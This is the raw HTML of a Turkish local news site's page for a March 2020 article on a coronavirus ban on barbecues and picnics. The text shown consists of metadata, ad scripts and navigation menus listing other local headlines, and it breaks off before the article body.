
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="keywords" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="news_keywords" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta property="og:description" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta property="og:url" content="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="twitter:description" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href='http://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href='http://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'> <link href="http://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" /> <meta itemprop="headline" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" /> <meta itemprop="articleSection" content="Güncel" name="section" /> <meta itemprop="dateCreated" content="2020-03-21T13:58:35+02:00" /> <meta itemprop="dateModified" content="2020-03-21T14:24:32+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="ca-pub-9060105052041849" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate"></span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate"></span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate"></span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/alagoz-ekonomik-pakette-oncelik-esnaflara-verilmeliydi-h66106.html" title="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”" >Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gungor-imar-plani-calismalarini-yerinde-inceledi-h66104.html" title="Başkan Güngör, imar planı çalışmalarını yerinde inceledi" >Başkan Güngör, imar planı çalışmalarını yerinde inceledi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/iyi-parti-genclik-kollarindan-yaslilar-icin-gonulluluk-hareketi-h66102.html" title="İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi" >İYİ Parti Gençlik Kolları’ndan yaşlılar için gönüllülük hareketi</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-mirac-allah-a-yukselis-ve-arinmadir-h66099.html" title="Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”" >Başkan Gürbüz, “Miraç Allah&#039;a yükseliş ve arınmadır”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-bulut-tarim-sektoru-icin-de-ekonomik-paket-aciklanmali-h66098.html" title="Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”" >Başkan Bulut: “Tarım sektörü için de ekonomik paket açıklanmalı”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/6-ayakli-dogan-kuzu-gorenleri-sasirtiyor-h66097.html" title="6 ayaklı doğan kuzu, görenleri şaşırtıyor" >6 ayaklı doğan kuzu, görenleri şaşırtıyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/baskan-general-kredi-ertelemesine-yonelik-calismalar-basladi-h66096.html" title="Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”" >Başkan General: “Kredi ertelemesine yönelik çalışmalar başladı”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/bassavciliktan-cezaevinde-salgin-tedbiri-yok-iddialarina-yalanlama-h66095.html" title="Başsavcılıktan ‘cezaevinde salgın tedbiri yok’ iddialarına yalanlama" >Başsavcılıktan ‘cezaevinde salgın tedbiri yok’ iddialarına yalanlama</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistan-vergi-dairesinden-mukelleflere-yeni-mobil-ve-interaktif-hizmetler-h66094.html" title="Elbistan Vergi Dairesi’nden mükelleflere yeni mobil ve interaktif hizmetler" >Elbistan Vergi Dairesi’nden mükelleflere yeni mobil ve interaktif hizmetler</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/sehit-uzman-onbasi-oguzhan-tas-son-yolculuguna-ugurlandi-h66093.html" title="Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı" >Şehit uzman onbaşı Oğuzhan Taş, son yolculuğuna uğurlandı</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="b776762706df03ba98add3083f80726376320e06" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" class="current" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h66101.html" title="Anma"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/anma_h66101_69c0c.jpg" alt="Anma" /> Anma</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/ibrahim-turk-h66091.html" title="İbrahim Türk"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/ibrahim_turk_h66091_7ba02.jpg" alt="İbrahim Türk" /> İbrahim Türk</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/himmet-yetisgen-73-yasinda-h66090.html" title="Himmet Yetişgen 73 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/himmet_yetisgen_73_yasinda_h66090_84678.jpg" alt="Himmet Yetişgen 73 yaşında" /> Himmet Yetişgen 73 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/sukriye-yuksel-66-yasinda-h66089.html" title="Şükriye Yüksel 66 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/sukriye_yuksel_66_yasinda_h66089_680c3.jpg" alt="Şükriye Yüksel 66 yaşında" /> Şükriye Yüksel 66 yaşında</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/alagoz-ekonomik-pakette-oncelik-esnaflara-verilmeliydi-h66106.html" title="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/alagoz_ekonomik_pakette_oncelik_esnaflara_verilmeliydi_h66106_b7e6a.jpg" alt="Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”" /> Alagöz: “Ekonomik pakette öncelik esnaflara verilmeliydi”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/berber-ve-kuaforler-saat-1800den-sonra-kapanacak-h66105.html" title="Berber ve kuaförler, saat 18.00’den sonra kapanacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/berber_ve_kuaforler_saat_1800den_sonra_kapanacak_h66105_4b083.jpg" alt="Berber ve kuaförler, saat 18.00’den sonra kapanacak" /> Berber ve kuaförler, saat 18.00’den sonra kapanacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/baskan-gungor-imar-plani-calismalarini-yerinde-inceledi-h66104.html" title="Başkan Güngör, imar planı çalışmalarını yerinde inceledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/baskan_gungor_imar_plani_calismalarini_yerinde_inceledi_h66104_8a193.jpg" alt="Başkan Güngör, imar planı çalışmalarını yerinde inceledi" /> Başkan Güngör, imar planı çalışmalarını yerinde inceledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/koronavirus-nedeniyle-mangal-ve-piknik-yapmak-da-yasaklandi-h66103.html" title="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/koronavirus_nedeniyle_mangal_ve_piknik_yapmak_da_yasaklandi_h66103_c156f.jpg" alt="Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı" /> Koronavirüs nedeniyle mangal ve piknik yapmak da yasaklandı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-eker-mazbatasini-aldi-h62471.html" title="Başkan Eker, mazbatasını aldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/baskan_eker_mazbatasini_aldi_h62471_6d495.JPG" alt="Başkan Eker, mazbatasını aldı" /> Başkan Eker, mazbatasını aldı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/oztunctan-gungore-hayirli-olsun-ziyareti-h62469.html" title="Öztunç’tan Güngör’e hayırlı olsun ziyareti"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/oztunctan_gungore_hayirli_olsun_ziyareti_h62469_f4649.jpg" alt="Öztunç’tan Güngör’e hayırlı olsun ziyareti" /> Öztunç’tan Güngör’e hayırlı olsun ziyareti</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/tedavi-sureclerinde-meslek-sahibi-olacaklar-h60414.html" title="Tedavi süreçlerinde meslek sahibi olacaklar"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2018/10/tedavi_sureclerinde_meslek_sahibi_olacaklar_h60414_dbbab.JPG" alt="Tedavi süreçlerinde meslek sahibi olacaklar" /> Tedavi süreçlerinde meslek sahibi olacaklar</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını 